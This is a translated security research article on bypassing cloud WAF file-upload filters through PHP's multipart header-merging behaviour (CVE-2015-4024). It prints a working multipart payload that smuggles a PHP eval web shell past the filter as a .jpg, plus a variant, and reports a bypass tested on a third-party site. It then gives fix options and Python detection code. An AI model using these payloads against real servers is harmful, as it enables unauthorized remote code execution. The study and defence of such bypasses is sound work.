1. Background information
This article starts from a PHP remote DoS vulnerability disclosed on 2015-04-03 (CVE-2015-4024); see https://bugs.php.net/bug.php?id=69364 for the technical details. When PHP parses the headers of a multipart body part, it concatenates multi-line header values, and each concatenation copies the whole accumulated string again, which results in the DoS. The vulnerability also has non-DoS uses, one of which is bypassing the file upload defenses of the various cloud WAFs currently in use.
Popular cloud WAF products at home and abroad include Baidu Cloud Acceleration, 360 Website Defender, Jiasule and Safedog. Using the PHP remote DoS vulnerability and the behaviour of the official PHP fix, we successfully bypassed the file upload defenses of the mainstream WAFs, namely Baidu Cloud Acceleration, 360 Website Defender, Knownsec Jiasule and Safedog.
Next, taking PHP as the example, we analyze our bypass method in detail.
2. How to bypass WAF
According to the PHP DoS vulnerability, when the multipart_buffer_headers function parses a header whose value spans n lines, every line that starts with whitespace or contains no ':' character triggers the code block below, which merges that line into the previous value. Parsing such a header therefore executes the merge block (n-1) times, each time copying the whole accumulated value, which results in the DoS.
prev_len = strlen(prev_entry.value);
cur_len = strlen(line);
entry.value = emalloc(prev_len + cur_len + 1);     /* one allocation */
memcpy(entry.value, prev_entry.value, prev_len);   /* one copy of the accumulated value */
memcpy(entry.value + prev_len, line, cur_len);     /* one copy of the new line */
entry.value[cur_len + prev_len] = '\0';
entry.key = estrdup(prev_entry.key);
zend_llist_remove_tail(header);                    /* one memory release */
The official PHP fix avoids the repeated copies during merging and so avoids the DoS, but the merging itself remains. The key to bypassing the WAF is exactly this behaviour: when multipart_buffer_headers parses a header whose value spans multiple lines, every line that starts with whitespace or contains no ':' character is merged into that value. WAFs do not take this protocol compatibility into account when parsing the uploaded file name, and because they do not perform the multi-line merge they can be bypassed.
Based on this principle we construct a payload that bypasses the WAF's file upload defense: the WAF resolves the file name to "test3.jpg", while PHP resolves it to "test3.jpg\nsf/shell.php"; because "/" is the directory delimiter, the uploaded file is saved as shell.php. The bypass payload, the test script and the upload result follow.
WAF bypass payload:
------WEBKITFORMBOUNDARYX7V4AHIPWN8IG52Y
Content-Disposition: form-data; name="file"; filename="test3.jpg\nsf/shell.php
Content-Type: application/octet-stream

<?php eval($_GET['c']); ?>
------WEBKITFORMBOUNDARYX7V4AHIPWN8IG52Y
File upload test script:
<?php
$name = $_FILES['file']['name'];
echo $name;
echo "\n";
move_uploaded_file($_FILES['file']['tmp_name'], '/usr/local/nginx/html/upload/' . $_FILES['file']['name']);
echo "Upload success! " . $_FILES['file']['name'];
echo "\n";
echo strlen($_FILES['file']['name']);
?>
The payload uploads successfully.
3. Bypassing WAFs in practice
The author set up test sites, placed them behind 360 Website Defender and Jiasule, and verified the bypass of their file upload defenses.
3.1 Bypassing 360 Website Defender
Step 1: verify that the site is protected by 360 Website Defender; a request that uploads a PHP file directly is intercepted.
Step 2: the bypass of 360 Website Defender succeeds and the shell is uploaded as apo.php. This request has no Content-Type header, which does not affect the bypass.
3.2 Bypassing Knownsec Jiasule
Step 1: verify that the site is protected by Jiasule; a request that uploads a PHP file directly is intercepted.
Step 2: the bypass of Jiasule succeeds and the shell is uploaded as syt.php.
3.3 Bypassing Baidu Cloud Acceleration
Baidu Cloud Acceleration is related to CloudFlare: the Baidu interception page shows that CloudFlare is in use, presumably as a localized version, so Baidu Cloud Acceleration is likely a joint Baidu and CloudFlare product. For the Baidu test we did not set up our own environment but found a site that uses Baidu Cloud Acceleration.
Step 1: verify that the site is protected by Baidu Cloud Acceleration; a request that uploads a PHP file directly is intercepted.
Step 2: the bypass of Baidu Cloud Acceleration succeeds.
4. Extensions and further work
4.1 Bypassing the file name check with other characters
Similarly, we found that besides double quotes, single quotation marks also bypass the WAF's defenses and achieve the file upload.
------WEBKITFORMBOUNDARYX7V4AHIPWN8IG52Y
Content-Disposition: form-data; name="file"; filename='test3.jpg\nsf/shell.php
Content-Type: application/octet-stream

<?php eval($_GET['c']); ?>
------WEBKITFORMBOUNDARYX7V4AHIPWN8IG52Y
4.2 Other server-side scripting languages
We also found that JSP parsing has its own peculiarities that can be used to bypass the WAF. Other commonly used web scripting languages such as ASP, ASPX and Python have not been tested yet.
5. Fixes
5.1 Fix option one
When parsing a file upload request, reject the request if it does not conform to the protocol specification. This may cause false positives, and the extent of their impact needs to be assessed.
5.2 Fix option two
Parse file names in a PHP-compatible way: when a file name begins with a single or double quotation mark, take it up to the corresponding closing single or double quotation mark.
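The parsing difference of section 2 and both fix options of section 5, as an added Python example that is not part of the original article: merge_header_lines and the php_* helpers reproduce the relevant PHP behaviour (continuation-line merge, quote-aware parameter parsing, basename) modelled on PHP's rfc1867.c as an assumption, not PHP's own code; is_spec_conformant implements fix option one, php_effective_filename implements fix option two, and naive_waf_filename models a line-oriented WAF pattern. The sample parts are constructed and include the article's payload and its single-quote variant from section 4.1.

```python
"""Added example (not from the original article): WAF-side checks for the
multipart file-name discrepancy of sections 2 and 5. Header merging and quote
handling are modelled on PHP's rfc1867.c as this example's author understands
it (an assumption); the sample parts below are constructed."""
import re
from typing import List, Optional, Tuple


def merge_header_lines(part_headers: str) -> List[Tuple[str, str]]:
    """Fold headers like multipart_buffer_headers(): a line starting with
    whitespace or lacking ':' is appended (no separator) to the previous value."""
    headers: List[Tuple[str, str]] = []
    for raw in part_headers.split("\n"):
        line = raw.rstrip("\r")              # next_line() strips the CRLF
        if line == "":
            break                             # blank line ends the header block
        if line[0] not in " \t" and ":" in line:
            key, value = line.split(":", 1)
            headers.append((key.strip().lower(), value.lstrip()))
        elif headers:                         # the (n-1) merges the article describes
            key, prev = headers.pop()
            headers.append((key, prev + line))
    return headers


def php_getword(s: str, stop: str) -> Tuple[str, str]:
    """Text before the next unquoted `stop` (php_ap_getword); an unclosed quote swallows the rest."""
    i = 0
    while i < len(s) and s[i] != stop:
        if s[i] in "\"'":
            q, i = s[i], i + 1
            while i < len(s) and s[i] != q:
                i += 2 if s[i] == "\\" and s[i + 1:i + 2] == q else 1
        i += 1
    return s[:i], s[i + 1:]


def php_getword_conf(s: str) -> str:
    """A parameter value like php_ap_getword_conf(): quoted runs to the matching
    quote or, if never closed, to the end; unquoted runs to whitespace."""
    s = s.lstrip()
    if not s or s[0] not in "\"'":
        return s.split()[0] if s else ""
    q, out, i = s[0], [], 1
    while i < len(s) and s[i] != q:
        if s[i] == "\\" and s[i + 1:i + 2] in (q, "\\"):
            i += 1                            # backslash-escaped quote or backslash
        out.append(s[i])
        i += 1
    return "".join(out)


def php_effective_filename(part_headers: str) -> Optional[str]:
    """Fix option two: the name PHP hands to move_uploaded_file(), i.e. merged
    headers -> Content-Disposition parameters -> last '/' or '\\' segment."""
    rest = next((v for k, v in merge_header_lines(part_headers) if k == "content-disposition"), "")
    filename = None
    while rest:
        pair, rest = php_getword(rest, ";")
        key, _, value = pair.partition("=")
        if key.strip().lower() == "filename":
            filename = php_getword_conf(value)
    return None if filename is None else re.split(r"[/\\]", filename)[-1]


# Fix option one: only a single-line, fully quoted Content-Disposition is accepted.
_STRICT_DISPOSITION = re.compile(
    r'^form-data;\s*name="[^"\r\n]*"(?:;\s*filename="[^"\r\n\\]*")?\s*$', re.I)


def is_spec_conformant(part_headers: str) -> bool:
    """Reject a part that would trigger a header merge in PHP or whose Content-Disposition is not strict."""
    for raw in part_headers.split("\n"):
        line = raw.rstrip("\r")
        if line == "":
            break
        if line[0] in " \t" or ":" not in line:
            return False
        key, value = line.split(":", 1)
        if key.strip().lower() == "content-disposition" and not _STRICT_DISPOSITION.match(value.strip()):
            return False
    return True


def naive_waf_filename(part_headers: str) -> Optional[str]:
    """What a line-oriented WAF pattern typically extracts: text up to the first quote or line break."""
    m = re.search(r"filename=[\"']?([^\"'\r\n]*)", part_headers, re.I)
    return m.group(1) if m else None


def upload_allowed(part_headers: str, allowed_ext=("jpg", "jpeg", "png", "gif")) -> bool:
    """Combined policy: enforce the protocol (option one), then judge the extension on PHP's name (option two)."""
    name = php_effective_filename(part_headers) if is_spec_conformant(part_headers) else None
    return bool(name) and "." in name and name.rsplit(".", 1)[1].lower() in allowed_ext


# Constructed sample parts (header block only, body omitted). BYPASS_PART is the article's
# payload written out: the quote is never closed and the name continues on a second line.
BENIGN_PART = ('Content-Disposition: form-data; name="file"; filename="test3.jpg"\r\n'
               'Content-Type: image/jpeg\r\n\r\n')
BYPASS_PART = ('Content-Disposition: form-data; name="file"; filename="test3.jpg\r\n'
               'sf/shell.php\r\nContent-Type: application/octet-stream\r\n\r\n')
SINGLE_QUOTE_PART = BYPASS_PART.replace('filename="', "filename='")  # section 4.1 variant
```

Calling the functions on the three constructed parts shows the discrepancy the article relies on: naive_waf_filename returns test3.jpg for all three, while php_effective_filename returns test3.jpg for the benign part but shell.php for both payload variants. is_spec_conformant rejects both payload variants before any extension is judged, and even a WAF that only adopted fix option two would judge shell.php rather than test3.jpg.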
6. Summary
This article reviewed the PHP remote DoS vulnerability (CVE-2015-4024) and used its underlying header-merging behaviour to bypass the file upload defenses of existing WAFs and upload a shell. More importantly, it offers a new way of thinking about WAF bypasses, a new direction: using the behavioural differences between back-end application scripts and the WAF to get around WAF defenses. In general, a good WAF should handle the differences between the web application containers, standard protocols and web servers it is compatible with.
New use of the PHP DoS vulnerability: CVE-2015-4024 reviewed